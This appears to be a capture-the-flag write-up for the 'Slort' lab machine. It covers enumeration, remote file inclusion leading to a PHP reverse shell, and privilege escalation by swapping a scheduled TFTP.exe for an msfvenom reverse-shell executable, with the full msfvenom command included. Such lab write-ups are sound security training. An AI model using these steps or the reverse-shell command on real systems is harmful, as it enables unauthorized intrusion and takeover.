Slort - Proving Grounds Practice

Enumeration

Initial nmap scan revealed FTP, SMB and HTTP 8080 ports were open.

At first I visited the website but it only showed default xampp page. Then I applied directory brute forcing and found /site endpoint.

Visiting the website I found ?page parameter which seemed suspicious.

Later, I tried RFI and it worked.

It worked because allow_url_include parameter was enabled.

I then downloaded ivan-sincek/php-reverse-shell and changed it to txt file (RFI to RCE) and updated IP value.

And I got user shell.

I then simply read the user flag.

There was a Backup folder and inside it there were three different files. info.txt stated that TFTP.exe is executed every 5 minutes.

So I created a reverse shell using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.210 LPORT=4444 -f exe -o exp.exe

Then I transfered the file as TFTP.exe and setup a netcat listener and waited for 5 minutes.

I simply obtained SYSTEM shell.